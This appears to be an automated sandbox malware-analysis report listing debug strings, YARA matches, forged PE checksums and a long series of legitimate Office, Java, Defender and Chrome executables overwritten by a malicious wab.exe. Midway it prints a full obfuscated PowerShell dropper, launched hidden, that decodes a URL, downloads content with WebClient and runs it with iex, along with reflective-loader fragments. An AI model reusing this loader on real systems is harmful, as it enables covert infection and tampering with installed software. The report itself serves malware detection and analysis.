Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\perfboost.pdb source: PerfBoost.exe.8.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000005.00000002.1992900389.0000000007945000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb source: javacpl.exe.8.dr
Source: Binary string: wab.pdb source: misc.exe1.8.dr, javacpl.exe.8.dr, MpDlpCmd.exe.8.dr, ie_to_edge_stub.exe.8.dr, DW20.EXE.8.dr, Uninstall.exe.8.dr, java.exe.8.dr, grv_icons.exe.8.dr, SCANPST.EXE.8.dr, SETLANG.EXE.8.dr, notification_click_helper.exe.8.dr, AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, PerfBoost.exe.8.dr, dbcicons.exe.8.dr, GoogleUpdate.exe.8.dr, msoev.exe.8.dr, LICLUA.EXE.8.dr, elevation_service.exe.8.dr, misc.exe0.8.dr, AutoIt3_x64.exe.8.dr, java.exe0.8.dr, accicons.exe.8.dr, MSOICONS.EXE.8.dr, pwahelper.exe.8.dr
Source: Binary string: MpDlpCmd.pdb source: MpDlpCmd.exe.8.dr
Source: Binary string: d:\dbs\el\ja2\target\x86\ship\dw\x-none\dw20.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: DW20.EXE.8.dr
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java_objs\java.pdb source: java.exe.8.dr, java.exe0.8.dr
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\perfboost.pdbb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: PerfBoost.exe.8.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\ie_to_edge_stub.exe.pdb source: ie_to_edge_stub.exe.8.dr
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\setlang.pdb source: SETLANG.EXE.8.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb@g source: powershell.exe, 00000005.00000002.1999294674.0000000008915000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\scanpst.pdb source: SCANPST.EXE.8.dr
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\setlang.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: SETLANG.EXE.8.dr

Data Obfuscation

Source: Yara match File source: 00000005.00000002.2002398118.000000000ACBC000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2001822967.0000000008D90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1989436125.000000000625A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2169302600.000001E2C4BB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Bilfragter)$global:Tilsikring = [System.Text.Encoding]::ASCII.GetString($Svedekurene)$global:Owertaen=$Tilsikring.substring($Erstatningsfri,$Capanne)<#Sandpaper Kontrollinie Skjoldbr
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Pegefingeren $Revets $Systemrelation), (Stimuleret @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Svingtud = [AppDomain]::CurrentDomain.GetAssemblies()$gl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Gaslighting)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Heliophobic, $false).DefineType($unadopted, $
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Bilfragter)$global:Tilsikring = [System.Text.Encoding]::ASCII.GetString($Svedekurene)$global:Owertaen=$Tilsikring.substring($Erstatningsfri,$Capanne)<#Sandpaper Kontrollinie Skjoldbr
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng 
Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOrdinuHiplir SysteP.pulsHy
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf 
');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOr
Source: AppVDllSurrogate.exe.8.dr Static PE information: 0x853858FE [Sun Oct 28 18:42:06 2040 UTC]
Source: MpCmdRun.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x19b52e
Source: SQLDumper.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x49b60
Source: AdobeARMHelper.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x64c50
Source: pj11icon.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x142395
Source: Aut2exe_x64.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x1c7652
Source: AppSharingHookController64.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x20765
Source: GoogleUpdateCore.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x47eca
Source: NisSrv.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x307019
Source: AppVDllSurrogate.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x3d892
Source: pptico.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x3f5707
Source: visicon.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x2df46c
Source: dbcicons.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x2bad0
Source: AppVDllSurrogate64.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x4ec22
Source: UcMapi.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x132706
Source: osmclienticon.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x2584f
Source: outicon.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x91610
Source: msoev.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x268d3
Source: mpextms.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0xee9bf
Source: lyncicon.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0xea647
Source: jaureg.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x95cbf
Source: GoogleUpdate.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x36547
Source: OfficeScrSanBroker.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0xc392a
Source: javaw.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x5043b
Source: OfficeScrBroker.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0xa8883
Source: MsMpEng.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x39d03
Source: pubs.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x1452a5
Source: Au3Info.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x3d6d8
Source: aimgr.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x3b0de
Source: GoogleUpdateBroker.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x2e9ce
Source: ai.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0xc328b
Source: Au3Info_x64.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x49bdd
Source: PerfBoost.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x6ed59
Source: javaws.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x6c99c
Source: MpCmdRun.exe0.8.dr Static PE information: real checksum: 0x8a074 should be: 0x146cda
Source: aimgr.exe0.8.dr Static PE information: real checksum: 0x8a074 should be: 0x2e51b
Source: Common.DBConnection.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x2153c
Source: GoogleUpdateOnDemand.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x2e8fe
Source: SDXHelper.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x38c81
Source: upx.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x5c64b
Source: VC_redist.x64.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0xaff0b
Source: Au3Check.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x4ace1
Source: GoogleCrashHandler.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x60b44
Source: sscicons.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x2bad0
Source: armsvc.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x38ee8
Source: AppVLP.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x710ec
Source: GoogleCrashHandler64.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x739bf
Source: Integrator.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x44ae38
Source: Microsoft.Mashup.Container.Loader.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x218c6
Source: AppSharingHookController.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x25428
Source: AutoIt3Help.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x2942f
Source: Uninstall.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x1d811
Source: officeappguardwin32.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x1ea61e
Source: jusched.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0xc76e3
Source: AppVDllSurrogate32.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x3d892
Source: Wordconv.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x1f925
Source: jucheck.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x138baf
Source: OcPubMgr.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x182a45
Source: chrome.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x2c9d6
Source: accicons.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x4235e8
Source: VSTOInstaller.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x23068
Source: misc.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x109391
Source: ai.exe0.8.dr Static PE information: real checksum: 0x8a074 should be: 0xa200f
Source: MpDlpCmd.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x74f87
Source: java.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x5013a
Source: SciTE.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x25609f
Source: MpCopyAccelerator.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x3e54a
Source: ConfigSecurityPolicy.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x8624f
Source: integrator.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x44ae38
Source: Aut2exe.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x1997a9
Source: OLicenseHeartbeat.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0xb8fc4
Source: AutoIt3_x64.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x11706f
Source: joticon.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0xbd8e2
Source: grv_icons.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x646fd
Source: GoogleUpdateComRegisterShell64.exe.8.dr Static PE information: real checksum: 0x8a074 should be: 0x3898a
Source: AppVDllSurrogate.exe.8.dr Static PE information: section name: .didat
Source: msoev.exe.8.dr Static PE information: section name: .didat
Source: OcPubMgr.exe.8.dr Static PE information: section name: .didat
Source: officeappguardwin32.exe.8.dr Static PE information: section name: .didat
Source: AppVDllSurrogate32.exe.8.dr Static PE information: section name: .didat
Source: OfficeScrBroker.exe.8.dr Static PE information: section name: .didat
Source: AppVDllSurrogate64.exe.8.dr Static PE information: section name: .didat
Source: OfficeScrSanBroker.exe.8.dr Static PE information: section name: .didat
Source: AppVLP.exe.8.dr Static PE information: section name: .didat
Source: Integrator.exe.8.dr Static PE information: section name: .didat
Source: Microsoft.Mashup.Container.Loader.exe.8.dr Static PE information: section name: .didat
Source: AppSharingHookController.exe.8.dr Static PE information: section name: .didat
Source: Common.DBConnection.exe.8.dr Static PE information: section name: .didat
Source: PerfBoost.exe.8.dr Static PE information: section name: .didat
Source: SDXHelper.exe.8.dr Static PE information: section name: .didat
Source: MpCmdRun.exe.8.dr Static PE information: section name: .didat
Source: MpDlpCmd.exe.8.dr Static PE information: section name: .didat
Source: mpextms.exe.8.dr Static PE information: section name: .didat
Source: MsMpEng.exe.8.dr Static PE information: section name: .didat
Source: NisSrv.exe.8.dr Static PE information: section name: .didat
Source: MpCmdRun.exe0.8.dr Static PE information: section name: .didat
Source: VC_redist.x64.exe.8.dr Static PE information: section name: .didat
Source: integrator.exe.8.dr Static PE information: section name: .didat
Source: ConfigSecurityPolicy.exe.8.dr Static PE information: section name: .didat
Source: MpCopyAccelerator.exe.8.dr Static PE information: section name: .didat
Source: UcMapi.exe.8.dr Static PE information: section name: .didat
Source: Wordconv.exe.8.dr Static PE information: section name: .didat
Source: ai.exe.8.dr Static PE information: section name: .didat
Source: aimgr.exe.8.dr Static PE information: section name: .didat
Source: chrome.exe.8.dr Static PE information: section name: .didat
Source: Au3Check.exe.8.dr Static PE information: section name: .didat
Source: Au3Info.exe.8.dr Static PE information: section name: .didat
Source: Au3Info_x64.exe.8.dr Static PE information: section name: .didat
Source: Aut2exe.exe.8.dr Static PE information: section name: .didat
Source: Aut2exe_x64.exe.8.dr Static PE information: section name: .didat
Source: upx.exe.8.dr Static PE information: section name: .didat
Source: AutoIt3Help.exe.8.dr Static PE information: section name: .didat
Source: ai.exe0.8.dr Static PE information: section name: .didat
Source: aimgr.exe0.8.dr Static PE information: section name: .didat
Source: OLicenseHeartbeat.exe.8.dr Static PE information: section name: .didat
Source: AppSharingHookController64.exe.8.dr Static PE information: section name: .didat
Source: AutoIt3_x64.exe.8.dr Static PE information: section name: .didat
Source: SciTE.exe.8.dr Static PE information: section name: .didat
Source: Uninstall.exe.8.dr Static PE information: section name: .didat
Source: AdobeARMHelper.exe.8.dr Static PE information: section name: .didat
Source: armsvc.exe.8.dr Static PE information: section name: .didat
Source: jaureg.exe.8.dr Static PE information: section name: .didat
Source: jucheck.exe.8.dr Static PE information: section name: .didat
Source: jusched.exe.8.dr Static PE information: section name: .didat
Source: VSTOInstaller.exe.8.dr Static PE information: section name: .didat
Source: SQLDumper.exe.8.dr Static PE information: section name: .didat
Source: accicons.exe.8.dr Static PE information: section name: .didat
Source: dbcicons.exe.8.dr Static PE information: section name: .didat
Source: grv_icons.exe.8.dr Static PE information: section name: .didat
Source: joticon.exe.8.dr Static PE information: section name: .didat
Source: lyncicon.exe.8.dr Static PE information: section name: .didat
Source: misc.exe.8.dr Static PE information: section name: .didat
Source: osmclienticon.exe.8.dr Static PE information: section name: .didat
Source: outicon.exe.8.dr Static PE information: section name: .didat
Source: java.exe.8.dr Static PE information: section name: .didat
Source: javaw.exe.8.dr Static PE information: section name: .didat
Source: javaws.exe.8.dr Static PE information: section name: .didat
Source: GoogleCrashHandler.exe.8.dr Static PE information: section name: .didat
Source: GoogleCrashHandler64.exe.8.dr Static PE information: section name: .didat
Source: GoogleUpdate.exe.8.dr Static PE information: section name: .didat
Source: GoogleUpdateBroker.exe.8.dr Static PE information: section name: .didat
Source: GoogleUpdateComRegisterShell64.exe.8.dr Static PE information: section name: .didat
Source: GoogleUpdateCore.exe.8.dr Static PE information: section name: .didat
Source: GoogleUpdateOnDemand.exe.8.dr Static PE information: section name: .didat
Source: pj11icon.exe.8.dr Static PE information: section name: .didat
Source: pptico.exe.8.dr Static PE information: section name: .didat
Source: pubs.exe.8.dr Static PE information: section name: .didat
Source: sscicons.exe.8.dr Static PE information: section name: .didat
Source: visicon.exe.8.dr Static PE information: section name: .didat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B8A756B push ebx; iretd 2_2_00007FFD9B8A756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B8A74FB push ebx; iretd 2_2_00007FFD9B8A756A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07B408C2 push eax; mov dword ptr [esp], ecx 5_2_07B40AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07B40AB8 push eax; mov dword ptr [esp], ecx 5_2_07B40AC4

Persistence and Installation Behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Windows\svchost.com
Source: C:\Program Files (x86)\Windows Mail\wab.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE Jump to behavior
